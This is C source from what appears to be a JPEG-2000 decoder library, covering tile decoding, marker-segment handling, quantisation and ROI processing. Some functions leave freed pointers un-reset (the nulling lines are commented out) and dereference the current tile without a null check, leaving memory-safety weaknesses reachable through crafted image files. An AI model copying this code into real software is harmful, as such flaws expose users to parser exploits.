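 * Release everything allocated for a tile by jpc_dec_tileinit() and packet
 * decoding (code blocks, precincts, bands, resolution levels, per-tile coding
 * parameters, packet iterator, and packet header stream), then mark the tile
 * as done.
 */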
static int jpc_dec_tilefini(jpc_dec_t *dec, jpc_dec_tile_t *tile)
{
jpc_dec_tcomp_t *tcomp;
int compno;
int bandno;
int rlvlno;
jpc_dec_band_t *band;
jpc_dec_rlvl_t *rlvl;
int prcno;
jpc_dec_prc_t *prc;
jpc_dec_seg_t *seg;
jpc_dec_cblk_t *cblk;
int cblkno;
if (tile->tcomps) {
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls;
++rlvlno, ++rlvl) {
if (!rlvl->bands) {
continue;
}
for (bandno = 0, band = rlvl->bands; bandno < rlvl->numbands;
++bandno, ++band) {
if (band->prcs) {
for (prcno = 0, prc = band->prcs; prcno <
rlvl->numprcs; ++prcno, ++prc) {
if (!prc->cblks) {
continue;
}
for (cblkno = 0, cblk = prc->cblks; cblkno <
prc->numcblks; ++cblkno, ++cblk) {
while (cblk->segs.head) {
seg = cblk->segs.head;
jpc_seglist_remove(&cblk->segs, seg);
jpc_seg_destroy(seg);
}
jas_matrix_destroy(cblk->data);
if (cblk->mqdec) {
jpc_mqdec_destroy(cblk->mqdec);
}
if (cblk->nulldec) {
jpc_bitstream_close(cblk->nulldec);
}
if (cblk->flags) {
jas_matrix_destroy(cblk->flags);
}
}
if (prc->incltagtree) {
jpc_tagtree_destroy(prc->incltagtree);
}
if (prc->numimsbstagtree) {
jpc_tagtree_destroy(prc->numimsbstagtree);
}
if (prc->cblks) {
jas_free(prc->cblks);
}
}
}
if (band->data) {
jas_matrix_destroy(band->data);
}
if (band->prcs) {
jas_free(band->prcs);
}
}
if (rlvl->bands) {
jas_free(rlvl->bands);
}
}
if (tcomp->rlvls) {
jas_free(tcomp->rlvls);
}
if (tcomp->data) {
jas_matrix_destroy(tcomp->data);
}
if (tcomp->tsfb) {
jpc_tsfb_destroy(tcomp->tsfb);
}
}
}
if (tile->cp) {
jpc_dec_cp_destroy(tile->cp);
//tile->cp = 0;
}
if (tile->tcomps) {
jas_free(tile->tcomps);
//tile->tcomps = 0;
}
if (tile->pi) {
jpc_pi_destroy(tile->pi);
//tile->pi = 0;
}
if (tile->pkthdrstream) {
jas_stream_close(tile->pkthdrstream);
//tile->pkthdrstream = 0;
}
if (tile->pptstab) {
jpc_ppxstab_destroy(tile->pptstab);
//tile->pptstab = 0;
}
tile->state = JPC_TILE_DONE;
return 0;
}
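/*
 * Fully reconstruct one tile: entropy-decode its code blocks, undo ROI
 * shifting and dequantize each band, run the inverse wavelet transform for
 * every component, undo the inter-component transform (RCT/ICT) if one was
 * used, then round, level-shift, clip, and write the samples to the image.
 */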
static int jpc_dec_tiledecode(jpc_dec_t *dec, jpc_dec_tile_t *tile)
{
int i;
int j;
jpc_dec_tcomp_t *tcomp;
jpc_dec_rlvl_t *rlvl;
jpc_dec_band_t *band;
int compno;
int rlvlno;
int bandno;
int adjust;
int v;
jpc_dec_ccp_t *ccp;
jpc_dec_cmpt_t *cmpt;
if (jpc_dec_decodecblks(dec, tile)) {
jas_eprintf("jpc_dec_decodecblks failed\n");
return -1;
}
/* Perform dequantization. */
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
ccp = &tile->cp->ccps[compno];
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls;
++rlvlno, ++rlvl) {
if (!rlvl->bands) {
continue;
}
for (bandno = 0, band = rlvl->bands;
bandno < rlvl->numbands; ++bandno, ++band) {
if (!band->data) {
continue;
}
jpc_undo_roi(band->data, band->roishift, ccp->roishift -
band->roishift, band->numbps);
if (tile->realmode) {
jas_matrix_asl(band->data, JPC_FIX_FRACBITS);
jpc_dequantize(band->data, band->absstepsize);
}
}
}
}
/* Apply an inverse wavelet transform if necessary. */
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
ccp = &tile->cp->ccps[compno];
jpc_tsfb_synthesize(tcomp->tsfb, tcomp->data);
}
/* Apply an inverse intercomponent transform if necessary. */
switch (tile->cp->mctid) {
case JPC_MCT_RCT:
if (dec->numcomps < 3) {
jas_eprintf("RCT requires at least three components\n");
return -1;
}
jpc_irct(tile->tcomps[0].data, tile->tcomps[1].data,
tile->tcomps[2].data);
break;
case JPC_MCT_ICT:
if (dec->numcomps < 3) {
jas_eprintf("ICT requires at least three components\n");
return -1;
}
jpc_iict(tile->tcomps[0].data, tile->tcomps[1].data,
tile->tcomps[2].data);
break;
}
/* Perform rounding and convert to integer values. */
if (tile->realmode) {
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) {
for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) {
v = jas_matrix_get(tcomp->data, i, j);
v = jpc_fix_round(v);
jas_matrix_set(tcomp->data, i, j, jpc_fixtoint(v));
}
}
}
}
/* Perform level shift. */
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
adjust = cmpt->sgnd ? 0 : (1 << (cmpt->prec - 1));
for (i = 0; i < jas_matrix_numrows(tcomp->data); ++i) {
for (j = 0; j < jas_matrix_numcols(tcomp->data); ++j) {
*jas_matrix_getref(tcomp->data, i, j) += adjust;
}
}
}
/* Perform clipping. */
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
jpc_fix_t mn;
jpc_fix_t mx;
mn = cmpt->sgnd ? (-(1 << (cmpt->prec - 1))) : (0);
mx = cmpt->sgnd ? ((1 << (cmpt->prec - 1)) - 1) : ((1 <<
cmpt->prec) - 1);
jas_matrix_clip(tcomp->data, mn, mx);
}
/* XXX need to free tsfb struct */
/* Write the data for each component of the image. */
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
if (jas_image_writecmpt(dec->image, compno, tcomp->xstart -
JPC_CEILDIV(dec->xstart, cmpt->hstep), tcomp->ystart -
JPC_CEILDIV(dec->ystart, cmpt->vstep), jas_matrix_numcols(
tcomp->data), jas_matrix_numrows(tcomp->data), tcomp->data)) {
jas_eprintf("write component failed\n");
return -1;
}
}
return 0;
}
static int jpc_dec_process_eoc(jpc_dec_t *dec, jpc_ms_t *ms)
{
int tileno;
jpc_dec_tile_t *tile;
/* Eliminate compiler warnings about unused variables. */
ms = 0;
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles; ++tileno,
++tile) {
if (tile->state == JPC_TILE_ACTIVE) {
if (jpc_dec_tiledecode(dec, tile)) {
return -1;
}
}
/* If the tile has not yet been finalized, finalize it. */
// OLD CODE: jpc_dec_tilefini(dec, tile);
if (tile->state != JPC_TILE_DONE) {
jpc_dec_tilefini(dec, tile);
}
}
/* We are done processing the code stream. */
dec->state = JPC_MT;
return 1;
}
static int jpc_dec_process_siz(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_siz_t *siz = &ms->parms.siz;
int compno;
int tileno;
jpc_dec_tile_t *tile;
jpc_dec_tcomp_t *tcomp;
int htileno;
int vtileno;
jpc_dec_cmpt_t *cmpt;
size_t size;
dec->xstart = siz->xoff;
dec->ystart = siz->yoff;
dec->xend = siz->width;
dec->yend = siz->height;
dec->tilewidth = siz->tilewidth;
dec->tileheight = siz->tileheight;
dec->tilexoff = siz->tilexoff;
dec->tileyoff = siz->tileyoff;
dec->numcomps = siz->numcomps;
if (!(dec->cp = jpc_dec_cp_create(dec->numcomps))) {
return -1;
}
if (!(dec->cmpts = jas_alloc2(dec->numcomps, sizeof(jpc_dec_cmpt_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts; compno < dec->numcomps; ++compno,
++cmpt) {
cmpt->prec = siz->comps[compno].prec;
cmpt->sgnd = siz->comps[compno].sgnd;
cmpt->hstep = siz->comps[compno].hsamp;
cmpt->vstep = siz->comps[compno].vsamp;
cmpt->width = JPC_CEILDIV(dec->xend, cmpt->hstep) -
JPC_CEILDIV(dec->xstart, cmpt->hstep);
cmpt->height = JPC_CEILDIV(dec->yend, cmpt->vstep) -
JPC_CEILDIV(dec->ystart, cmpt->vstep);
cmpt->hsubstep = 0;
cmpt->vsubstep = 0;
}
dec->image = 0;
dec->numhtiles = JPC_CEILDIV(dec->xend - dec->tilexoff, dec->tilewidth);
dec->numvtiles = JPC_CEILDIV(dec->yend - dec->tileyoff, dec->tileheight);
if (!jas_safe_size_mul(dec->numhtiles, dec->numvtiles, &size)) {
return -1;
}
dec->numtiles = size;
JAS_DBGLOG(10, ("numtiles = %d; numhtiles = %d; numvtiles = %d;\n",
dec->numtiles, dec->numhtiles, dec->numvtiles));
if (!(dec->tiles = jas_alloc2(dec->numtiles, sizeof(jpc_dec_tile_t)))) {
return -1;
}
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles; ++tileno,
++tile) {
htileno = tileno % dec->numhtiles;
vtileno = tileno / dec->numhtiles;
tile->realmode = 0;
tile->state = JPC_TILE_INIT;
tile->xstart = JAS_MAX(dec->tilexoff + htileno * dec->tilewidth,
dec->xstart);
tile->ystart = JAS_MAX(dec->tileyoff + vtileno * dec->tileheight,
dec->ystart);
tile->xend = JAS_MIN(dec->tilexoff + (htileno + 1) *
dec->tilewidth, dec->xend);
tile->yend = JAS_MIN(dec->tileyoff + (vtileno + 1) *
dec->tileheight, dec->yend);
tile->numparts = 0;
tile->partno = 0;
tile->pkthdrstream = 0;
tile->pkthdrstreampos = 0;
tile->pptstab = 0;
tile->cp = 0;
tile->pi = 0;
if (!(tile->tcomps = jas_alloc2(dec->numcomps,
sizeof(jpc_dec_tcomp_t)))) {
return -1;
}
for (compno = 0, cmpt = dec->cmpts, tcomp = tile->tcomps;
compno < dec->numcomps; ++compno, ++cmpt, ++tcomp) {
tcomp->rlvls = 0;
tcomp->numrlvls = 0;
tcomp->data = 0;
tcomp->xstart = JPC_CEILDIV(tile->xstart, cmpt->hstep);
tcomp->ystart = JPC_CEILDIV(tile->ystart, cmpt->vstep);
tcomp->xend = JPC_CEILDIV(tile->xend, cmpt->hstep);
tcomp->yend = JPC_CEILDIV(tile->yend, cmpt->vstep);
tcomp->tsfb = 0;
}
}
dec->pkthdrstreams = 0;
/* We should expect to encounter other main header marker segments
or an SOT marker segment next. */
dec->state = JPC_MH;
return 0;
}
static int jpc_dec_process_cod(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_cod_t *cod = &ms->parms.cod;
jpc_dec_tile_t *tile;
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromcod(dec->cp, cod);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno != 0) {
return -1;
}
jpc_dec_cp_setfromcod(tile->cp, cod);
break;
}
return 0;
}
static int jpc_dec_process_coc(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_coc_t *coc = &ms->parms.coc;
jpc_dec_tile_t *tile;
if (JAS_CAST(int, coc->compno) >= dec->numcomps) {
jas_eprintf("invalid component number in COC marker segment\n");
return -1;
}
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromcoc(dec->cp, coc);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromcoc(tile->cp, coc);
break;
}
return 0;
}
static int jpc_dec_process_rgn(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_rgn_t *rgn = &ms->parms.rgn;
jpc_dec_tile_t *tile;
if (JAS_CAST(int, rgn->compno) >= dec->numcomps) {
jas_eprintf("invalid component number in RGN marker segment\n");
return -1;
}
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromrgn(dec->cp, rgn);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromrgn(tile->cp, rgn);
break;
}
return 0;
}
static int jpc_dec_process_qcd(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_qcd_t *qcd = &ms->parms.qcd;
jpc_dec_tile_t *tile;
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromqcd(dec->cp, qcd);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromqcd(tile->cp, qcd);
break;
}
return 0;
}
static int jpc_dec_process_qcc(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_qcc_t *qcc = &ms->parms.qcc;
jpc_dec_tile_t *tile;
if (JAS_CAST(int, qcc->compno) >= dec->numcomps) {
jas_eprintf("invalid component number in QCC marker segment\n");
return -1;
}
switch (dec->state) {
case JPC_MH:
jpc_dec_cp_setfromqcc(dec->cp, qcc);
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (tile->partno > 0) {
return -1;
}
jpc_dec_cp_setfromqcc(tile->cp, qcc);
break;
}
return 0;
}
static int jpc_dec_process_poc(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_poc_t *poc = &ms->parms.poc;
jpc_dec_tile_t *tile;
switch (dec->state) {
case JPC_MH:
if (jpc_dec_cp_setfrompoc(dec->cp, poc, 1)) {
return -1;
}
break;
case JPC_TPH:
if (!(tile = dec->curtile)) {
return -1;
}
if (!tile->partno) {
if (jpc_dec_cp_setfrompoc(tile->cp, poc, (!tile->partno))) {
return -1;
}
} else {
jpc_pi_addpchgfrompoc(tile->pi, poc);
}
break;
}
return 0;
}
static int jpc_dec_process_ppm(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_ppm_t *ppm = &ms->parms.ppm;
jpc_ppxstabent_t *ppmstabent;
if (!dec->ppmstab) {
if (!(dec->ppmstab = jpc_ppxstab_create())) {
return -1;
}
}
if (!(ppmstabent = jpc_ppxstabent_create())) {
return -1;
}
ppmstabent->ind = ppm->ind;
ppmstabent->data = ppm->data;
ppm->data = 0;
ppmstabent->len = ppm->len;
if (jpc_ppxstab_insert(dec->ppmstab, ppmstabent)) {
return -1;
}
return 0;
}
static int jpc_dec_process_ppt(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_ppt_t *ppt = &ms->parms.ppt;
jpc_dec_tile_t *tile;
jpc_ppxstabent_t *pptstabent;
tile = dec->curtile;
if (!tile->pptstab) {
if (!(tile->pptstab = jpc_ppxstab_create())) {
return -1;
}
}
if (!(pptstabent = jpc_ppxstabent_create())) {
return -1;
}
pptstabent->ind = ppt->ind;
pptstabent->data = ppt->data;
ppt->data = 0;
pptstabent->len = ppt->len;
if (jpc_ppxstab_insert(tile->pptstab, pptstabent)) {
return -1;
}
return 0;
}
static int jpc_dec_process_com(jpc_dec_t *dec, jpc_ms_t *ms)
{
/* Eliminate compiler warnings about unused variables. */
dec = 0;
ms = 0;
return 0;
}
static int jpc_dec_process_unk(jpc_dec_t *dec, jpc_ms_t *ms)
{
/* Eliminate compiler warnings about unused variables. */
dec = 0;
jas_eprintf("warning: ignoring unknown marker segment\n");
jpc_ms_dump(ms, stderr);
return 0;
}
/******************************************************************************\
*
\******************************************************************************/
static jpc_dec_cp_t *jpc_dec_cp_create(uint_fast16_t numcomps)
{
jpc_dec_cp_t *cp;
jpc_dec_ccp_t *ccp;
int compno;
if (!(cp = jas_malloc(sizeof(jpc_dec_cp_t)))) {
return 0;
}
cp->flags = 0;
cp->numcomps = numcomps;
cp->prgord = 0;
cp->numlyrs = 0;
cp->mctid = 0;
cp->csty = 0;
if (!(cp->ccps = jas_alloc2(cp->numcomps, sizeof(jpc_dec_ccp_t)))) {
goto error;
}
if (!(cp->pchglist = jpc_pchglist_create())) {
goto error;
}
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
ccp->flags = 0;
ccp->numrlvls = 0;
ccp->cblkwidthexpn = 0;
ccp->cblkheightexpn = 0;
ccp->qmfbid = 0;
ccp->numstepsizes = 0;
ccp->numguardbits = 0;
ccp->roishift = 0;
ccp->cblkctx = 0;
}
return cp;
error:
if (cp) {
jpc_dec_cp_destroy(cp);
}
return 0;
}
static jpc_dec_cp_t *jpc_dec_cp_copy(jpc_dec_cp_t *cp)
{
jpc_dec_cp_t *newcp;
jpc_dec_ccp_t *newccp;
jpc_dec_ccp_t *ccp;
int compno;
if (!(newcp = jpc_dec_cp_create(cp->numcomps))) {
return 0;
}
newcp->flags = cp->flags;
newcp->prgord = cp->prgord;
newcp->numlyrs = cp->numlyrs;
newcp->mctid = cp->mctid;
newcp->csty = cp->csty;
jpc_pchglist_destroy(newcp->pchglist);
newcp->pchglist = 0;
if (!(newcp->pchglist = jpc_pchglist_copy(cp->pchglist))) {
jas_free(newcp);
return 0;
}
for (compno = 0, newccp = newcp->ccps, ccp = cp->ccps;
compno < cp->numcomps;
++compno, ++newccp, ++ccp) {
*newccp = *ccp;
}
return newcp;
}
static void jpc_dec_cp_resetflags(jpc_dec_cp_t *cp)
{
int compno;
jpc_dec_ccp_t *ccp;
cp->flags &= (JPC_CSET | JPC_QSET);
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
ccp->flags = 0;
}
}
static void jpc_dec_cp_destroy(jpc_dec_cp_t *cp)
{
if (cp->ccps) {
jas_free(cp->ccps);
}
if (cp->pchglist) {
jpc_pchglist_destroy(cp->pchglist);
}
jas_free(cp);
}
static int jpc_dec_cp_isvalid(jpc_dec_cp_t *cp)
{
uint_fast16_t compcnt;
jpc_dec_ccp_t *ccp;
if (!(cp->flags & JPC_CSET) || !(cp->flags & JPC_QSET)) {
return 0;
}
for (compcnt = cp->numcomps, ccp = cp->ccps; compcnt > 0; --compcnt,
++ccp) {
		/* Are there enough step sizes for the number of bands? */
if ((ccp->qsty != JPC_QCX_SIQNT && JAS_CAST(int, ccp->numstepsizes) < 3 *
ccp->numrlvls - 2) || (ccp->qsty == JPC_QCX_SIQNT &&
ccp->numstepsizes != 1)) {
return 0;
}
}
return 1;
}
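/*
 * Derive per-band step sizes for scalar implicit (SIQNT) quantization, where
 * only a single step size is signalled in the code stream. The mantissa is
 * reused unchanged for every band, and the exponent expression below reduces
 * to expn + ((bandno > 0) ? (bandno + 2) / 3 : 0); for example, band 0 keeps
 * expn, bands 1-3 get expn + 1, and bands 4-6 get expn + 2.
 */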
static void calcstepsizes(uint_fast16_t refstepsize, int numrlvls,
uint_fast16_t *stepsizes)
{
int bandno;
int numbands;
uint_fast16_t expn;
uint_fast16_t mant;
expn = JPC_QCX_GETEXPN(refstepsize);
mant = JPC_QCX_GETMANT(refstepsize);
numbands = 3 * numrlvls - 2;
for (bandno = 0; bandno < numbands; ++bandno) {
stepsizes[bandno] = JPC_QCX_MANT(mant) | JPC_QCX_EXPN(expn +
(numrlvls - 1) - (numrlvls - 1 - ((bandno > 0) ? ((bandno + 2) / 3) : (0))));
}
}
static int jpc_dec_cp_prepare(jpc_dec_cp_t *cp)
{
jpc_dec_ccp_t *ccp;
int compno;
int i;
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
if (!(ccp->csty & JPC_COX_PRT)) {
for (i = 0; i < JPC_MAXRLVLS; ++i) {
ccp->prcwidthexpns[i] = 15;
ccp->prcheightexpns[i] = 15;
}
}
if (ccp->qsty == JPC_QCX_SIQNT) {
calcstepsizes(ccp->stepsizes[0], ccp->numrlvls, ccp->stepsizes);
}
}
return 0;
}
static int jpc_dec_cp_setfromcod(jpc_dec_cp_t *cp, jpc_cod_t *cod)
{
jpc_dec_ccp_t *ccp;
int compno;
cp->flags |= JPC_CSET;
cp->prgord = cod->prg;
if (cod->mctrans) {
cp->mctid = (cod->compparms.qmfbid == JPC_COX_INS) ? (JPC_MCT_ICT) : (JPC_MCT_RCT);
} else {
cp->mctid = JPC_MCT_NONE;
}
cp->numlyrs = cod->numlyrs;
cp->csty = cod->csty & (JPC_COD_SOP | JPC_COD_EPH);
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
jpc_dec_cp_setfromcox(cp, ccp, &cod->compparms, 0);
}
cp->flags |= JPC_CSET;
return 0;
}
static int jpc_dec_cp_setfromcoc(jpc_dec_cp_t *cp, jpc_coc_t *coc)
{
jpc_dec_cp_setfromcox(cp, &cp->ccps[coc->compno], &coc->compparms, JPC_COC);
return 0;
}
static int jpc_dec_cp_setfromcox(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_coxcp_t *compparms, int flags)
{
int rlvlno;
/* Eliminate compiler warnings about unused variables. */
cp = 0;
if ((flags & JPC_COC) || !(ccp->flags & JPC_COC)) {
ccp->numrlvls = compparms->numdlvls + 1;
ccp->cblkwidthexpn = JPC_COX_GETCBLKSIZEEXPN(
compparms->cblkwidthval);
ccp->cblkheightexpn = JPC_COX_GETCBLKSIZEEXPN(
compparms->cblkheightval);
ccp->qmfbid = compparms->qmfbid;
ccp->cblkctx = compparms->cblksty;
ccp->csty = compparms->csty & JPC_COX_PRT;
for (rlvlno = 0; rlvlno < compparms->numrlvls; ++rlvlno) {
ccp->prcwidthexpns[rlvlno] =
compparms->rlvls[rlvlno].parwidthval;
ccp->prcheightexpns[rlvlno] =
compparms->rlvls[rlvlno].parheightval;
}
ccp->flags |= flags | JPC_CSET;
}
return 0;
}
static int jpc_dec_cp_setfromqcd(jpc_dec_cp_t *cp, jpc_qcd_t *qcd)
{
int compno;
jpc_dec_ccp_t *ccp;
for (compno = 0, ccp = cp->ccps; compno < cp->numcomps;
++compno, ++ccp) {
jpc_dec_cp_setfromqcx(cp, ccp, &qcd->compparms, 0);
}
cp->flags |= JPC_QSET;
return 0;
}
static int jpc_dec_cp_setfromqcc(jpc_dec_cp_t *cp, jpc_qcc_t *qcc)
{
return jpc_dec_cp_setfromqcx(cp, &cp->ccps[qcc->compno], &qcc->compparms, JPC_QCC);
}
static int jpc_dec_cp_setfromqcx(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_qcxcp_t *compparms, int flags)
{
int bandno;
/* Eliminate compiler warnings about unused variables. */
cp = 0;
if ((flags & JPC_QCC) || !(ccp->flags & JPC_QCC)) {
ccp->flags |= flags | JPC_QSET;
for (bandno = 0; bandno < compparms->numstepsizes; ++bandno) {
ccp->stepsizes[bandno] = compparms->stepsizes[bandno];
}
ccp->numstepsizes = compparms->numstepsizes;
ccp->numguardbits = compparms->numguard;
ccp->qsty = compparms->qntsty;
}
return 0;
}
static int jpc_dec_cp_setfromrgn(jpc_dec_cp_t *cp, jpc_rgn_t *rgn)
{
jpc_dec_ccp_t *ccp;
ccp = &cp->ccps[rgn->compno];
ccp->roishift = rgn->roishift;
return 0;
}
static int jpc_pi_addpchgfrompoc(jpc_pi_t *pi, jpc_poc_t *poc)
{
int pchgno;
jpc_pchg_t *pchg;
for (pchgno = 0; pchgno < poc->numpchgs; ++pchgno) {
if (!(pchg = jpc_pchg_copy(&poc->pchgs[pchgno]))) {
return -1;
}
if (jpc_pchglist_insert(pi->pchglist, -1, pchg)) {
return -1;
}
}
return 0;
}
static int jpc_dec_cp_setfrompoc(jpc_dec_cp_t *cp, jpc_poc_t *poc, int reset)
{
int pchgno;
jpc_pchg_t *pchg;
if (reset) {
while (jpc_pchglist_numpchgs(cp->pchglist) > 0) {
pchg = jpc_pchglist_remove(cp->pchglist, 0);
jpc_pchg_destroy(pchg);
}
}
for (pchgno = 0; pchgno < poc->numpchgs; ++pchgno) {
if (!(pchg = jpc_pchg_copy(&poc->pchgs[pchgno]))) {
return -1;
}
if (jpc_pchglist_insert(cp->pchglist, -1, pchg)) {
return -1;
}
}
return 0;
}
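/*
 * Convert a signalled (mantissa, exponent) quantizer step size into an
 * absolute fixed-point step size. The code below computes
 * (1 + mant / 2^11) * 2^(numbits - expn), which matches the usual JPEG-2000
 * step-size rule with numbits as the nominal dynamic range of the band.
 */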
static jpc_fix_t jpc_calcabsstepsize(int stepsize, int numbits)
{
jpc_fix_t absstepsize;
int n;
absstepsize = jpc_inttofix(1);
n = JPC_FIX_FRACBITS - 11;
absstepsize |= (n >= 0) ? (JPC_QCX_GETMANT(stepsize) << n) :
(JPC_QCX_GETMANT(stepsize) >> (-n));
n = numbits - JPC_QCX_GETEXPN(stepsize);
absstepsize = (n >= 0) ? (absstepsize << n) : (absstepsize >> (-n));
return absstepsize;
}
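/*
 * Scale every nonzero coefficient in the matrix by the absolute step size;
 * a step size of exactly 1.0 in fixed-point is treated as a no-op.
 */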
static void jpc_dequantize(jas_matrix_t *x, jpc_fix_t absstepsize)
{
int i;
int j;
int t;
assert(absstepsize >= 0);
if (absstepsize == jpc_inttofix(1)) {
return;
}
for (i = 0; i < jas_matrix_numrows(x); ++i) {
for (j = 0; j < jas_matrix_numcols(x); ++j) {
t = jas_matrix_get(x, i, j);
if (t) {
t = jpc_fix_mul(t, absstepsize);
} else {
t = 0;
}
jas_matrix_set(x, i, j, t);
}
}
}
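/*
 * Undo the encoder's ROI scaling: samples whose magnitude is at least
 * 2^roishift are region-of-interest samples and are shifted back down by
 * roishift, while background samples are shifted up by bgshift and masked to
 * the band's nominal number of bit planes.
 */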
static void jpc_undo_roi(jas_matrix_t *x, int roishift, int bgshift, int numbps)
{
int i;
int j;
int thresh;
jpc_fix_t val;
jpc_fix_t mag;
bool warn;
uint_fast32_t mask;
if (roishift < 0) {
/* We could instead return an error here. */
/* I do not think it matters much. */
jas_eprintf("warning: forcing negative ROI shift to zero "
"(bitstream is probably corrupt)\n");
roishift = 0;
}
if (roishift == 0 && bgshift == 0) {
return;
}
thresh = 1 << roishift;
warn = false;
for (i = 0; i < jas_matrix_numrows(x); ++i) {
for (j = 0; j < jas_matrix_numcols(x); ++j) {
val = jas_matrix_get(x, i, j);
mag = JAS_ABS(val);
if (mag >= thresh) {
/* We are dealing with ROI data. */
mag >>= roishift;
val = (val < 0) ? (-mag) : mag;
jas_matrix_set(x, i, j, val);
} else {
/* We are dealing with non-ROI (i.e., background) data. */
mag <<= bgshift;
mask = (JAS_CAST(uint_fast32_t, 1) << numbps) - 1;
/* Perform a basic sanity check on the sample value. */
/* Some implementations write garbage in the unused
most-significant bit planes introduced by ROI shifting.
Here we ensure that any such bits are masked off. */
if (mag & (~mask)) {
if (!warn) {
jas_eprintf("warning: possibly corrupt code stream\n");
warn = true;
}
mag &= mask;
}
val = (val < 0) ? (-mag) : mag;
jas_matrix_set(x, i, j, val);
}
}
}
}
static jpc_dec_t *jpc_dec_create(jpc_dec_importopts_t *impopts, jas_stream_t *in)
{
jpc_dec_t *dec;
if (!(dec = jas_malloc(sizeof(jpc_dec_t)))) {
return 0;
}
dec->image = 0;
dec->xstart = 0;
dec->ystart = 0;
dec->xend = 0;
dec->yend = 0;
dec->tilewidth = 0;
dec->tileheight = 0;
dec->tilexoff = 0;
dec->tileyoff = 0;
dec->numhtiles = 0;
dec->numvtiles = 0;
dec->numtiles = 0;
dec->tiles = 0;
dec->curtile = 0;
dec->numcomps = 0;
dec->in = in;
dec->cp = 0;
dec->maxlyrs = impopts->maxlyrs;
dec->maxpkts = impopts->maxpkts;
dec->numpkts = 0;
dec->ppmseqno = 0;
dec->state = 0;
dec->cmpts = 0;
dec->pkthdrstreams = 0;
dec->ppmstab = 0;
dec->curtileendoff = 0;
return dec;
}
static void jpc_dec_destroy(jpc_dec_t *dec)
{
if (dec->cstate) {
jpc_cstate_destroy(dec->cstate);
}
if (dec->pkthdrstreams) {
jpc_streamlist_destroy(dec->pkthdrstreams);
}
if (dec->image) {
jas_image_destroy(dec->image);
}
if (dec->cp) {
jpc_dec_cp_destroy(dec->cp);
}
if (dec->cmpts) {
jas_free(dec->cmpts);
}
if (dec->tiles) {
jas_free(dec->tiles);
}
jas_free(dec);
}
/******************************************************************************\
*
\******************************************************************************/
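/*
 * Doubly-linked-list helpers for the per-code-block segment lists.
 * jpc_seglist_insert() links 'node' immediately after 'ins', or at the head
 * of the list when 'ins' is a null pointer.
 */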
void jpc_seglist_insert(jpc_dec_seglist_t *list, jpc_dec_seg_t *ins, jpc_dec_seg_t *node)
{
jpc_dec_seg_t *prev;
jpc_dec_seg_t *next;
	prev = ins;
	next = prev ? (prev->next) : 0;
	node->prev = prev;
	node->next = next;
if (prev) {
prev->next = node;
} else {
list->head = node;
}
if (next) {
next->prev = node;
} else {
list->tail = node;
}
}
void jpc_seglist_remove(jpc_dec_seglist_t *list, jpc_dec_seg_t *seg)
{
jpc_dec_seg_t *prev;
jpc_dec_seg_t *next;
prev = seg->prev;
next = seg->next;
if (prev) {
prev->next = next;
} else {
list->head = next;
}
if (next) {
next->prev = prev;
} else {
list->tail = prev;
}
seg->prev = 0;
seg->next = 0;
}
jpc_dec_seg_t *jpc_seg_alloc()
{
jpc_dec_seg_t *seg;
if (!(seg = jas_malloc(sizeof(jpc_dec_seg_t)))) {
return 0;
}
seg->prev = 0;
seg->next = 0;
seg->passno = -1;
seg->numpasses = 0;
seg->maxpasses = 0;
seg->type = JPC_SEG_INVALID;
seg->stream = 0;
seg->cnt = 0;
seg->complete = 0;
seg->lyrno = -1;
return seg;
}
void jpc_seg_destroy(jpc_dec_seg_t *seg)
{
if (seg->stream) {
jas_stream_close(seg->stream);
}
jas_free(seg);
}
static int jpc_dec_dump(jpc_dec_t *dec, FILE *out)
{
jpc_dec_tile_t *tile;
int tileno;
jpc_dec_tcomp_t *tcomp;
int compno;
jpc_dec_rlvl_t *rlvl;
int rlvlno;
jpc_dec_band_t *band;
int bandno;
